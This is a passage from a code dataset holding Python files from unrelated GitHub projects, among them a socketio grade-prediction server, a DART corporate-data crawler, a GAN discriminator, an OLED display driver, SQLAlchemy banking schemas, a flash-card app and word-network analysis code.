PTS\")\n graph = torch_geometric.data.Batch.from_data_list([self.data[ind][0] for ind in range(len(self.data))])\n y = torch.from_numpy(np.array([(self.data[i][1] - reward_mean)/reward_std for i in range(len(self.data))])).float()\n test_loss = self.criterion(self.forward(graph), y.unsqueeze(-1)).item()\n return test_loss\n \n def evaluate(self, morphology):\n if self.thompson and self.test_dropout_mask is None:\n self.test_dropout_mask = (torch.distributions.Bernoulli(\n torch.full((1, self.last_extractor_dim), 0.5)\n ).sample() / 0.5)\n graph = self.morphology_graph_fn(morphology, include_segments=self.include_segments)\n graph = torch_geometric.data.Batch.from_data_list(obs_to_graph([graph]))\n with torch.no_grad():\n value = self.forward(graph, dropout_mask=self.test_dropout_mask)[0]\n return value\n","repo_name":"jhejna/morphology-opt","sub_path":"optimal_agents/policies/pruning_models.py","file_name":"pruning_models.py","file_ext":"py","file_size_in_byte":5435,"program_lang":"python","lang":"en","doc_type":"code","stars":19,"dataset":"github-code","pt":"40"} +{"seq_id":"5520074602","text":"import utils\nimport constant\nimport numpy as np\nfrom aiohttp import web\nimport socketio\nimport os\n\nsio = socketio.AsyncServer(async_mode='aiohttp')\napp = web.Application()\nsio.attach(app)\n\n@sio.on('timeElapsed', namespace='/home')\nasync def timeElapsed():\n \"\"\"Example of how to send server generated events to clients.\"\"\"\n second = 0\n minute = 0\n hour = 0\n while True:\n await sio.sleep(1)\n second += 1\n if second == 60:\n second = 0\n minute += 1\n if minute == 60:\n minute = 0\n hour += 1\n await sio.emit('timeElapsed', {'data': '%s : %s : %s' % (hour, minute, second)}, namespace='/home')\n\n@sio.on('predictAndRecommend', namespace='/home')\nasync def predictAndRecommend(sid, mark):\n # print(mark)\n markDict = utils.predictMark(mark)\n # print(markDict)\n await sio.emit('markResult', markDict, room=sid, namespace='/home')\n subjectCombinationMark = utils.calculateSubjectCombinationMark(markDict)\n # print(subjectCombinationMark)\n await sio.emit('markPerGradeResult', subjectCombinationMark, room=sid, namespace='/home')\n listUniversities = utils.findUniversities(subjectCombinationMark)\n await sio.emit('universitiesResult', listUniversities, room=sid, namespace='/home')\n # for university in listUniversities:\n # 
print(university)\n\nasync def mainPage(request):\n with open(constant.MAINPAGE_HTML, encoding='utf8') as f:\n return web.Response(text=f.read(), content_type='text/html')\n\n@sio.on('connect', namespace='/home')\nasync def connect(sid, environ):\n print('Client Connected: ' +str(sid))\n\n@sio.on('disconnect', namespace='/home')\ndef disconnect(sid):\n print('Client Disconnected: ' + str(sid))\n\napp.router.add_static('/static', constant.WEB_DIR + 'static')\napp.router.add_get('/', mainPage)\n\nif __name__ == '__main__':\n #http://0.0.0.0:8080/result?subCom=nature&math0=0&math1=0&math2=0&literature0=0&literature1=0&literature2=0&english0=0&english1=0&english2=0&physics0=0&physics1=0&physics2=0&chemistry0=0&chemistry1=0&chemistry2=0&biology0=0&biology1=0&biology2=0&history0=0&history1=0&history2=0&geography0=0&geography1=0&geography2=0&civiceducation0=0&civiceducation1=0&civiceducation2=0\n sio.start_background_task(timeElapsed)\n web.run_app(app)\n","repo_name":"martinakaduc/mpurs-v2.0","sub_path":"code/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"33041001852","text":"import manga109api\nfrom PIL import Image, ImageDraw\n\ndef draw_rectangle(img, x0, y0, x1, y1, annotation_type):\n assert annotation_type in [\"body\", \"face\", \"frame\", \"text\"]\n color = {\"body\": \"#258039\", \"face\": \"#f5be41\",\n \"frame\": \"#31a9b8\", \"text\": \"#cf3721\"}[annotation_type]\n draw = ImageDraw.Draw(img)\n draw.rectangle([x0, y0, x1, y1], outline=color, width=10)\n\nif __name__ == \"__main__\":\n manga109_root_dir = \"../Manga109s_released_2021_12_30\"\n book = \"ARMS\"\n page_index = 6\n\n p = manga109api.Parser(root_dir=manga109_root_dir)\n annotation = p.get_annotation(book=book)\n img = Image.open(p.img_path(book=book, index=page_index))\n\n # for annotation_type in [\"body\", \"face\", \"frame\", \"text\"]:\n for annotation_type in [\"text\"]:\n rois = annotation[\"page\"][page_index][annotation_type]\n for roi in rois:\n draw_rectangle(img, roi[\"@xmin\"], roi[\"@ymin\"], roi[\"@xmax\"], roi[\"@ymax\"], annotation_type)\n\n img.save(\"out.jpg\")","repo_name":"eddie0509tw/Dbnet","sub_path":"manga_preprocess/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":994,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"40"} +{"seq_id":"34591649668","text":"import random\nfrom pathlib import Path\n\nfrom analytics.utils import loading_json, writing_json\n\ndef data_model(modelout, refdata, rndseed=816223):\n mt = loading_json(modelout)\n mt_id = {it['id']:it for it in mt}\n rf = loading_json(refdata)\n rf_id = {it['id']:it for it in rf}\n id = sorted(list(set(mt_id)), key=lambda id:int(id.split('.')[-1]))\n out_items = []\n for i in id:\n itm = {'id':i}\n itm['word'] = rf_id[i]['word']\n itm['gloss-ref']=rf_id[i]['gloss']\n itm['gloss-out']=mt_id[i]['gloss']\n itm['example']=rf_id[i]['example']\n out_items.append(itm)\n file_over = Path(modelout).with_suffix('.refalign.json')\n writing_json(file_over, out_items)\n random.seed(rndseed)\n random.shuffle(out_items)\n file_over = Path(modelout).with_suffix('.refalign.rndshuff.json')\n writing_json(file_over, out_items)\n\nif __name__ == '__main__':\n data_model('/home/olygina/project/semeval2022/submission/defmod/defmod.en.sgns.json',\n 
'/home/olygina/codwoe/reference_data/en.test.defmod.complete.json')\n","repo_name":"drgere/diploma","sub_path":"analytics/defmod/aligning.py","file_name":"aligning.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24972433002","text":"import pandas as pd\nimport requests\nimport time\nimport sys\nimport re\n\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nfrom databases import maria\n\n\ndef printProgress(iteration, total, prefix='', suffix='', decimals=1, barLength=100):\n formatStr = \"{0:.\" + str(decimals) + \"f}\"\n percent = formatStr.format(100 * (iteration / float(total)))\n filledLength = int(round(barLength * iteration / float(total)))\n bar = '#' * filledLength + '-' * (barLength - filledLength)\n sys.stdout.write('\\r%s |%s| %s%s %s' % (prefix, bar, percent, '%', suffix)),\n if iteration == total:\n sys.stdout.write('\\n')\n sys.stdout.flush()\n\n\nurl = 'http://dart.fss.or.kr/corp/searchCorpL.ax'\n\nfor i in range(8, 218):\n printProgress(i, 217, '# Progress :', 'processing page %s of 217.' % i, 2, 50)\n\n params = {'currentPage': '%s' % i}\n\n # corporationType: P(유가증권, KOSPI), A(KOSDAQ), N(KONEX), E(기타법인)\n response = requests.post(url, params=params)\n soup = BeautifulSoup(response.content, 'lxml')\n trs = soup.find_all('tr')\n\n data = []\n is_first = True\n\n for a in trs:\n if is_first:\n is_first = False\n continue\n\n corp_code = a.find('input', {'name': 'hiddenCikCD1'}).get('value')\n corp_name = a.find('input', {'name': 'hiddenCikNM1'}).get('value')\n market_type = a.find('img').get('alt')\n\n tr_string = re.sub('[\\t\\r\\n\\v\\f]|\\'|\\\"', '', str(a))\n symb_code = re.findall('<td style=padding:0 2px;text-align:center;>([A-Z0-9]{6})</td>', tr_string)\n corp_type_name = re.findall('종 :([\\w.가-힣 ,;]*)>', tr_string)\n corp_name_both = re.findall('회  사  명 :(.*)영  문  명 :(.*)대표자', tr_string)\n\n data.append([corp_code,\n corp_name,\n corp_name_both[0][1] if len(corp_name_both) and len(corp_name_both[0]) > 1 else '',\n corp_type_name[0] if len(corp_type_name) else '',\n 'E' if market_type == '기타법인' else (\n 'I' if market_type == '유가증권시장' else (\n 'Q' if market_type == '코스닥시장' else (\n 'X' if market_type == '코넥스시장' else ''))),\n symb_code[0] if len(symb_code) else ''])\n\n ## End for loop, for a in trs:\n\n df_corpinfo = pd.DataFrame(data, columns=['corp_code',\n 'corp_name',\n 'corp_name_en',\n 'corp_type_name',\n 'market_type_code',\n 'symb_code'])\n mariadb = maria()\n mariadb.insert(\"dart_corp_info\", df_corpinfo)\n\n print('\\n# Progress : %s the corporation & symbol informations are stored successfully.' 
% '{:,}'.format(\n        len(df_corpinfo)))\n\n    time.sleep(0.15)\n\n## End for loop, for i in range(1, 218):\n\nprint(df_corpinfo.head())\n\n\n","repo_name":"PeterDeSOM/innostock","sub_path":"crawl/dart.init.corpinfo.py","file_name":"dart.init.corpinfo.py","file_ext":"py","file_size_in_byte":3058,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"19306496698","text":"from kivy.uix.button import Button\r\n\r\nfrom mdata.drivers.config.config_management import ConfigManagement\r\n\r\n\r\nclass SaveButton(Button):\r\n    def __init__(self, base, **kwargs):\r\n        self.base = base\r\n        self.text = 'Save'\r\n        self.size_hint = (0.2, 0.1)\r\n        self.inputs = kwargs['inputs']\r\n        self.incorrect_inputs = list()\r\n        self.exceptions = ['company_list']\r\n        super(SaveButton, self).__init__(**kwargs)\r\n\r\n    def on_press(self):\r\n        self.base.hide_save_labels()\r\n        data = {name: value.get_text() for (name, value)\r\n                in self.inputs.items()\r\n                if name not in self.exceptions}\r\n        config = ConfigManagement()\r\n        try:\r\n            self.validate_inputs()\r\n            config.set_data(data)\r\n            self.base.add_widget(self.base.labels['saved'])\r\n        except ValueError:\r\n            wrong_labels = [self.base.labels[label].text\r\n                            for label in self.incorrect_inputs]\r\n            error = 'Error during saving configuration.\\n' \\\r\n                    'Wrong content: {box}'\\\r\n                    .format(box=' '.join(wrong_labels))\r\n            self.base.labels['not_saved_custom'].text = error\r\n            self.base.add_widget(self.base.labels['not_saved_custom'])\r\n        except Exception as e:\r\n            print(e)\r\n            self.base.add_widget(self.base.labels['not_saved'])\r\n\r\n    def validate_inputs(self):\r\n        self.incorrect_inputs = list()\r\n        for name, content in self.inputs.items():\r\n            if not content.validate:\r\n                self.incorrect_inputs.append(name)\r\n        if self.incorrect_inputs:\r\n            raise ValueError\r\n","repo_name":"LukasPolon/MData","sub_path":"mDataAn/mdata/gui/buttons/save_button.py","file_name":"save_button.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"3107257513","text":"#coding=utf-8\nimport numpy as np\nimport tensorflow as tf\n\nfrom ops import *\nfrom tensorflow.layers import batch_normalization\n\nclass Discriminator:\n    def __init__(self,img_shape):\n        _,_,channels = img_shape\n        # Initialize weights and biases\n        # Define a Variable Scope to tell the generator and the discriminator apart\n        layer_sizes = [64,64,128,256]\n        with tf.variable_scope('d'):\n            print(\"Initializing discriminator weights\")\n\n            self.W1 = init_weights([5,5,channels,layer_sizes[0]])\n            self.b1 = init_bias([layer_sizes[0]])\n\n            self.W2 = init_weights([3,3,layer_sizes[0],layer_sizes[1]])\n            self.b2 = init_bias([layer_sizes[1]])\n            \n            self.W3 = init_weights([5,5,layer_sizes[1],layer_sizes[2]])\n            self.b3 = init_bias([layer_sizes[2]])\n            \n            self.W4 = init_weights([5,5,layer_sizes[2],layer_sizes[3]])\n            self.b4 = init_bias([layer_sizes[3]])\n            \n            self.W5 = init_weights([5,5, 7*7*layer_sizes[3],1])\n            self.b5 = init_bias([1])\n\n    def forword(self,X,momentum=0.5):\n        # Build the forward pass\n        # Four conv layers and no pooling; stride 2 in the conv layers shrinks the image instead\n        # One fully connected layer\n\n        # First layer\n        # Stride shape is [batch,height,width,channels]\n        z = conv2d(X, self.W1, [1, 2, 2, 1], padding=\"SAME\") # 14x14x64\n        # Add the bias\n        z = tf.nn.bias_add(z, self.b1)\n        # Activation function: leaky ReLU\n        z = tf.nn.leaky_relu(z)\n        \n        # Second layer\n        z = conv2d(z, self.W2, [1, 1, 1, 1], padding=\"SAME\") # 14x14x64\n        z = tf.nn.bias_add(z, self.b2)\n        # Batch normalization with momentum 0.5\n        z = batch_normalization(z, momentum=momentum)\n        z = tf.nn.leaky_relu(z)\n\n        # Third layer\n        z = conv2d(z, self.W3, [1, 2, 2, 1], padding=\"SAME\") # 7x7x128\n        z = tf.nn.bias_add(z, self.b3)\n        z = batch_normalization(z, momentum=momentum)\n        z = tf.nn.leaky_relu(z)\n\n        z = conv2d(z, self.W4, [1, 1, 1, 1], padding=\"SAME\") # 7x7x256\n        z = tf.nn.bias_add(z, self.b4)\n        z = batch_normalization(z, momentum=momentum)\n        z = tf.nn.leaky_relu(z)\n\n        # Fully connected layer\n        # Flatten the image\n        z = tf.reshape(z, [-1, 7*7*256])\n        logits = tf.matmul(z, self.W5)\n        logits = tf.nn.bias_add(logits, self.b5)\n        return logits","repo_name":"zideajang/tf_tut","sub_path":"ch9/discriminator.py","file_name":"discriminator.py","file_ext":"py","file_size_in_byte":2509,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"40917881531","text":"import framebuf\nimport time\n\n\n_SET_PAGE_ADDRESS = const(0xB0)\n_DISPLAY_OFF = const(0xAE)\n_DISPLAY_ON = const(0xAF)\n_LOW_COLUMN_ADDRESS = const(0x00)\n_HIGH_COLUMN_ADDRESS = const(0x10)\n_START_LINE_ADDRESS = const(0x40)\n_SET_CONTRAST_CTRL_REG = const(0x81)\n_SET_NORMAL_DISPLAY = const(0xA6) # normal/inverse\n\n\nclass SH1106:\n    width = 128\n    height = 64\n\n    def __init__(self, spi, dc, rst, cs):\n        self.spi = spi\n        self.cs = cs\n        self.dc = dc\n        self.rst = rst\n        self.cs.init(self.cs.OUT, value=1)\n        self.dc.init(self.dc.OUT, value=0)\n        self.rst.init(self.rst.OUT, value=1)\n        self._buffer = bytearray(self.height // 8 * self.width)\n        self._framebuf = framebuf.FrameBuffer1(\n            self._buffer, self.width, self.height)\n        self.reset()\n\n    def reset(self):\n        self.rst.low()\n        time.sleep_ms(50)\n        self.rst.high()\n        time.sleep_ms(50)\n\n    def _data(self, data):\n        self.dc.high()\n        self.cs.low()\n        self.spi.write(data)\n        self.cs.high()\n\n    def _write(self, command, data=None):\n        self.dc.low()\n        self.cs.low()\n        self.spi.write(bytearray([command]))\n        self.cs.high()\n        if data:\n            self._data(data)\n\n    def vscroll(self, dy):\n        self._write(_START_LINE_ADDRESS | dy & 0x3f)\n\n    def inverse(self, value):\n        self._write(_SET_NORMAL_DISPLAY | bool(value))\n\n    def contrast(self, value):\n        self._write(_SET_CONTRAST_CTRL_REG, bytearray([value]))\n\n    def sleep(self, value):\n        self._write(_DISPLAY_OFF | (not value))\n\n    def fill(self, col):\n        self._framebuf.fill(col)\n\n    def pixel(self, x, y, col):\n        self._framebuf.pixel(x, y, col)\n\n    def scroll(self, dx, dy):\n        self._framebuf.scroll(dx, dy)\n\n    def text(self, string, x, y, col=1):\n        self._framebuf.text(string, x, y, col)\n\n    def show(self):\n        for page in range(self.height // 8):\n            self._write(_SET_PAGE_ADDRESS | page)\n            self._write(_LOW_COLUMN_ADDRESS | 2)\n            self._write(_HIGH_COLUMN_ADDRESS | 0)\n            self._data(self._buffer[\n                self.width * page:self.width * page + self.width\n            ])\n","repo_name":"mcauser/deshipu-micropython-ili9341","sub_path":"sh1106.py","file_name":"sh1106.py","file_ext":"py","file_size_in_byte":2209,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"73739271160","text":"#!/usr/bin/env python3\n\nfrom sklearn.model_selection import GroupKFold, cross_val_score\nfrom xgboost import XGBClassifier\nimport polars as pl\nimport pandas as pd\nimport numpy as np\nfrom joblib import dump, load\nimport argparse\nimport logging\nimport os\n\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.ensemble import RandomForestClassifier,GradientBoostingClassifier,AdaBoostClassifier,ExtraTreesClassifier\nfrom sklearn.preprocessing import StandardScaler,MaxAbsScaler\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.linear_model import
LogisticRegression,Perceptron\nfrom sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis\nfrom sklearn.pipeline import make_pipeline\n\nif __name__ == '__main__':\n parent_parser = argparse.ArgumentParser(add_help=False)\n parent_parser.add_argument('--debug', help='output debug information', action=\"store_true\")\n #parent_parser.add_argument('--version', help='output version information and quit', action='version', version=repeatm.__version__)\n parent_parser.add_argument('--quiet', help='only output errors', action=\"store_true\")\n\n # ./12_apply_model.py --model the.model -x the.x --training-data-header <(head the.training-data-header)\n parent_parser.add_argument('--models', nargs='+', help='models to use', required=True)\n parent_parser.add_argument('-x', help='table of inputs to use', required=True)\n parent_parser.add_argument('--training-data-header', help='header of training data', required=True)\n parent_parser.add_argument('--output-predictions', help='output predictions', required=True)\n args = parent_parser.parse_args()\n\n # Setup logging\n if args.debug:\n loglevel = logging.DEBUG\n elif args.quiet:\n loglevel = logging.ERROR\n else:\n loglevel = logging.INFO\n logging.basicConfig(level=loglevel, format='%(asctime)s %(levelname)s: %(message)s', datefmt='%d/%m/%Y %I:%M:%S %p')\n\n\n # Read in data\n # d = pl.read_csv('TableAncestralRoot1.tsv',sep=\"\\t\")\n d = pd.read_csv(args.x, sep=\"\\t\")\n logging.info(\"Read in input data of shape {}\".format(d.shape))\n\n # Collapse counts of each COG subfamily\n d2 = d\n d2['COG'] = d2['COG'].str.split('_').str[0]\n d3 = d2.groupby('COG').sum()\n d4 = d3.transpose()\n\n # Read training data header\n eg_data = pl.read_csv(args.training_data_header, separator=\"\\t\", has_header=True)\n header = eg_data.select(pl.exclude([\n 'accession','false_negative_rate','false_positive_rate'\n ])).columns\n # Blacklist these as they aren't in the current ancestral file, not sure why\n header = list([h for h in header if h not in ['COG0411', 'COG0459', 'COG0564', 'COG1344', 'COG4177']])\n \n # Reorder columns to be the same as the training dataset\n d5 = d4[header]\n\n all_results = []\n for model_path in args.models:\n logging.info(\"Loading model {}\".format(model_path))\n model = load(model_path)\n logging.info(\"Loaded model {}\".format(model_path))\n\n doing_perceptron = 'Perceptron' in model_path\n\n preds = model.predict(d5)\n # if doing_perceptron:\n # probas = pl.lit(-1.0)\n # else:\n # probas = model.predict_proba(d5)[:,1]\n\n results = pl.DataFrame({\n 'node': list(d5.index.values),\n 'preds': preds\n })\n results = results.select(\n pl.col('node'),\n pl.col('preds').alias('prediction').cast(pl.Int64),\n # pl.col('proba').alias('probability').cast(pl.Float64),\n pl.lit(model_path).alias('model')\n )\n if doing_perceptron:\n results = results.with_columns(pl.lit(-1.0).alias('probability').cast(pl.Float64))\n else:\n results = results.with_columns(pl.lit(model.predict_proba(d5)[:,1]).alias('probability').cast(pl.Float64))\n all_results.append(results)\n\n pl.concat(all_results).write_csv(args.output_predictions, separator=\"\\t\")\n logging.info(\"Wrote predictions to {}\".format(args.output_predictions))\n ","repo_name":"wwood/bacterial_dating_aerobic_predictor","sub_path":"13_apply_model.py","file_name":"13_apply_model.py","file_ext":"py","file_size_in_byte":4033,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"40"} +{"seq_id":"10667819941","text":"import cx_Oracle\nfrom 
configs.config import get_settings\nfrom functools import lru_cache\n\nsettings = get_settings()\n\n@lru_cache()\ndef get_cursor():\n try:\n dsn = cx_Oracle.makedsn(\n settings.db_public_ip,\n settings.db_port,\n sid=settings.db_sid\n )\n connection = cx_Oracle.connect(\n settings.db_user,\n settings.db_password,\n dsn,\n encoding=\"UTF-8\"\n )\n print(\"Successfully connected to Oracle Database\")\n\n cursor = connection.cursor()\n return cursor, connection\n except cx_Oracle.Error as error:\n print(\"Error while connecting to Oracle:\", error)\n\n return None, None\n\n","repo_name":"Zoopast/DUOC-Feria-Backend","sub_path":"db/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"4254650113","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Feb 6 20:38:51 2022\n\n@author: 12105\n\"\"\"\nimport pandas as pd\nimport numpy as np\n\n# Time series, lesson 1:\ndf = pd.read_csv('input_data.csv')\n# Two types of features: time-step and lag features\n\n### Time-step features can be derived directly from the time index\n#Most basic time-step feature: time dummy (count of time steps in series from beginning to end)\n\ndf['Time'] = np.arange(len(df.index))\n\n# Lag features\n\ndf['Lag_1'] = df['Hardcover'].shift(1)\ndf = df.reindex(columns=['Hardcover','Lag_1'])\n\n# observations are shifted in time (similar to lag/lead window functions in SQL)\n# allows for investigating the effect of the previous observations \n\n# Lag plots view observations plotted against the previous observation\n\n#Lag features allow the modeling of serial dependence:\n# data can be predicted from previous observations\n\n#pandas' shift method is used to lag a series\ndf['Lag_1'] = df['NumVehicles'].shift(1)\n\n# DROP missing values and the corresponding targets:\nfrom sklearn.linear_model import LinearRegression\n\nX = df.loc[:, ['Lag_1']]\nX.dropna(inplace=True)\ny = df.loc[:, 'NumVehicles']\ny, X = y.align(X, join='inner')\n\nmodel = LinearRegression()\nmodel.fit(X,y)\n\ny_pred = pd.Series(model.predict(X), index=X.index)\n\n","repo_name":"ogradyso/Store_Sales_TimeSeries","sub_path":"kaggle_notes/analysis_kaggle.py","file_name":"analysis_kaggle.py","file_ext":"py","file_size_in_byte":1270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"45473116770","text":"from sqlalchemy import Table, Column, Integer, Numeric, String, MetaData, DateTime, PrimaryKeyConstraint, ForeignKey, \\\n UniqueConstraint, create_engine\nfrom datetime import datetime\n\n\nclass InitializeDataLayer:\n engine = None\n conn_string = None\n metadata = MetaData()\n\n users = Table(\"users\", metadata,\n Column(\"user_id\", Integer(), autoincrement=True, nullable=False),\n Column(\"login_id\", String(50), index=True),\n Column(\"first_name\", String(50)),\n Column(\"last_name\", String(50)),\n Column(\"phone\", String(50)),\n Column(\"created_on\", DateTime(), default=datetime.now()),\n Column(\"updated_on\", DateTime(), default=datetime.now(), onupdate=datetime.now()),\n PrimaryKeyConstraint('user_id', name='user_pk'),\n UniqueConstraint('login_id', name='uix_username')\n )\n\n customers = Table(\"customers\", metadata,\n Column(\"customer_id\", Integer(), primary_key=True, autoincrement=True),\n Column(\"id_type\", String(10)),\n Column(\"customer_ref\", String(50)),\n Column(\"personal_id\", String(50)),\n Column(\"email\", String(50)),\n 
Column(\"created_on\", DateTime(), default=datetime.now()),\n Column(\"updated_on\", DateTime(), default=datetime.now(), onupdate=datetime.now()),\n Column(\"created_by\", ForeignKey('users.user_id')),\n Column(\"updated_by\", ForeignKey('users.user_id'))\n )\n accounts = Table(\"account\", metadata,\n Column(\"account_id\", Integer(), primary_key=True, autoincrement=True),\n Column(\"account_number\", String(50), index=True),\n Column(\"name\", String(50)),\n Column(\"account_type\", String(50)),\n Column(\"balance\", Numeric(10, 2)),\n Column(\"customer_ref\", ForeignKey('customers.customer_ref')),\n Column(\"created_on\", DateTime(), default=datetime.now()),\n Column(\"updated_on\", DateTime(), default=datetime.now(), onupdate=datetime.now()),\n Column(\"created_by\", ForeignKey('users.user_id')),\n Column(\"updated_by\", ForeignKey('users.user_id')))\n\n def db_init(self, conn_string):\n self.conn_string = conn_string\n self.engine = create_engine(self.conn_string, echo=True)\n self.metadata.create_all(self.engine)\n\n def get_engine(self):\n return self.engine\n\n\ndal = InitializeDataLayer()\n","repo_name":"rajeshdas668822/retail-banking-python","sub_path":"src/native_sql/data_access/data_setup.py","file_name":"data_setup.py","file_ext":"py","file_size_in_byte":2709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23627002532","text":"from tkinter import Canvas, PhotoImage, Tk, Button, Label\nfrom typing import Text\nimport pandas as pd\nfrom random import choice\nBACKGROUND_COLOR = \"#B1DDC6\"\nFONT = 'Ariel'\n\n#Reading the data and creating a dictionary\ntry:\n data = pd.read_csv('./data/words_to_learn.csv').to_dict(orient='records')\nexcept FileNotFoundError:\n data = pd.read_csv('./data/french_words.csv').to_dict(orient='records')\n\nprint(len(data))\nword_dict = {}\n\n#Functions\ndef random_word():\n global word_dict, flip\n window.after_cancel(flip)\n word_dict = choice(data)\n french_word = word_dict['French']\n canvas.itemconfig(language_text, text='French', fill='black')\n canvas.itemconfig(vocab_word, text=french_word, fill='black')\n canvas.itemconfig(card, image=card_front_image)\n flip = window.after(3000, flip_card)\n\ndef right_button_click():\n data.remove(word_dict)\n pd.DataFrame(data).to_csv('./data/words_to_learn.csv', index=False)\n \n window.after_cancel(flip)\n random_word()\n\ndef wrong_button_click():\n window.after_cancel(flip)\n random_word()\n\ndef flip_card():\n canvas.itemconfig(language_text, text='English', fill='white')\n canvas.itemconfig(vocab_word, text=word_dict['English'], fill='white')\n canvas.itemconfig(card, image=card_back_image)\n\n#-----------Creating the User Interface--------\nwindow = Tk()\nwindow.title('Flash Card App')\nwindow.minsize(width=800, height=526)\nwindow.config(padx=50, pady=50, bg=BACKGROUND_COLOR)\n\ncanvas = Canvas(width=800, height=526, bg=BACKGROUND_COLOR, highlightthickness=0)\ncard_front_image = PhotoImage(file='.//images/card_front.png')\ncard_back_image = PhotoImage(file='./images/card_back.png')\ncard = canvas.create_image(400, 263, image=card_front_image)\nlanguage_text = canvas.create_text(400,150, text='French', fill='black', font=(FONT, 40, 'italic'))\nvocab_word = canvas.create_text(400,263, text='French', fill='black', font=(FONT, 60, 'bold'))\ncanvas.grid(column=0, row=0, columnspan=2)\n\nwrong_button_image = PhotoImage(file='./images/wrong.png')\nwrong_button = Button(image=wrong_button_image, highlightthickness=0, 
highlightbackground=BACKGROUND_COLOR, command=wrong_button_click)\nwrong_button.grid(column=0, row=1)\n\nright_button_image = PhotoImage(file='./images/right.png')\nright_button = Button(image=right_button_image, highlightthickness=0, highlightbackground=BACKGROUND_COLOR, command=right_button_click)\nright_button.grid(column=1, row=1)\n\nflip = window.after(3000, flip_card)\nrandom_word()\n\n\n\nwindow.mainloop()","repo_name":"gvarg75/UdemyDSCourse","sub_path":"100_days_of_python/day_31/flash-card-project-start/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8591460116","text":"'''PREREQUISITES'''\n\n### these should go easy\nimport sys\nimport pandas as pd\nimport numpy as np\nimport os\nimport string\nimport collections\nimport regex as re\n\n\n### this requires installation\nimport nltk\nfrom nltk.collocations import *\n\n### for network analysis\nimport networkx as nx\n\n### for visualization\nimport plotly.plotly as py\nimport plotly.graph_objs as go\nfrom plotly.offline import download_plotlyjs, init_notebook_mode, plot, iplot\nimport plotly.io as pio\n###init_notebook_mode(connected=True)\n\n\ndef network_formation_df(data_frame, prezident, lexicon_size, threshold):\n    '''From a dataframe with rows corresponding to individual documents,\n    to be subselected on the basis of author's name column, for instance'''\n    lemmata_list = []\n    ### for each year's speech:\n    for element in data_frame[data_frame[\"rok_prezident\"].str.endswith(prezident)][\"lemmata_filtered\"].tolist(): \n        lemmata_list.extend(element)\n    lexicon = [word_tuple[0] for word_tuple in nltk.FreqDist(lemmata_list).most_common(lexicon_size)]\n    bigrams_list = []\n    for element in data_frame[data_frame[\"rok_prezident\"].str.endswith(prezident)][\"lemmata_filtered\"].tolist():\n        lemmatized_text = element\n        for bigram in nltk.bigrams(lemmatized_text):\n            if ((bigram[0] in lexicon) & (bigram[1] in lexicon)):\n                if bigram[0] != bigram[1]:\n                    bigrams_list.append(tuple(sorted(bigram)))\n    bigrams_counts = list((collections.Counter(bigrams_list)).items())\n    bigrams_counts = sorted(bigrams_counts, key=lambda x: x[1], reverse=True)\n    ### create a NetworkX object\n    G = nx.Graph()\n    G.clear()\n    ### form the network from tuples of this form: (node1, node2, number of co-occurrences / length of the document)\n    G.add_weighted_edges_from(np.array([(bigram_count[0][0], bigram_count[0][1], int(bigram_count[1])) for bigram_count in bigrams_counts if bigram_count[1] >= threshold]))\n    ### add distance attribute\n    for (u, v, wt) in G.edges.data('weight'):\n        G.add_edge(u,v,distance=round(1/ int(wt), 5))\n    document_lenght = len(lemmata_list)\n    for (u, v, wt) in G.edges.data('weight'):\n        G.add_edge(u,v,norm_weight=round(int(wt)/document_lenght, 5))\n    return G\ndef ego_network_drawing_reduced(network, term, num_of_neighbours, title, mode):\n    '''derive ego network from a preexisting network\n    specify source term and number of neighbors\n    includes only shortest paths from the source'''\n    length, path = nx.single_source_dijkstra(network, term, target=None, weight=\"distance\")\n    shortest_nodes = list(length.keys())[0:num_of_neighbours+1]\n    path_values_sorted = [dict_pair[1] for dict_pair in sorted(path.items(), key=lambda pair: list(length.keys()).index(pair[0]))]\n    path_edges = []\n    for path_to_term in path_values_sorted[1:num_of_neighbours+1]:\n        path_edges.extend([tuple(sorted(bigram)) for bigram in nltk.bigrams(path_to_term)])\n    shortest_edges = list(set(path_edges))\n    ego_network = network.copy(as_view=False)\n    nodes_to_remove = []\n    for node in ego_network.nodes:\n        if node not in shortest_nodes:\n            nodes_to_remove.append(node)\n    for element in nodes_to_remove:\n        ego_network.remove_node(element) \n    edges_to_remove = []\n    for edge in ego_network.edges:\n        if edge not in shortest_edges:\n            if (edge[1],edge[0]) not in shortest_edges:\n                edges_to_remove.append(edge)\n    for element in edges_to_remove:\n        ego_network.remove_edge(element[0], element[1])\n    return draw_3d_network(ego_network, title, mode)\n\ndef draw_3d_network(networkx_object, file_name, mode):\n    '''take networkX object and draw it in 3D'''\n    Edges = list(networkx_object.edges)\n    L=len(Edges)\n    distance_list = [distance[2] for distance in list(networkx_object.edges.data(\"distance\"))]\n    weight_list = [int(float(weight[2])) for weight in list(networkx_object.edges.data(\"weight\"))]\n    labels= list(networkx_object.nodes)\n    N = len(labels)\n    adjc= 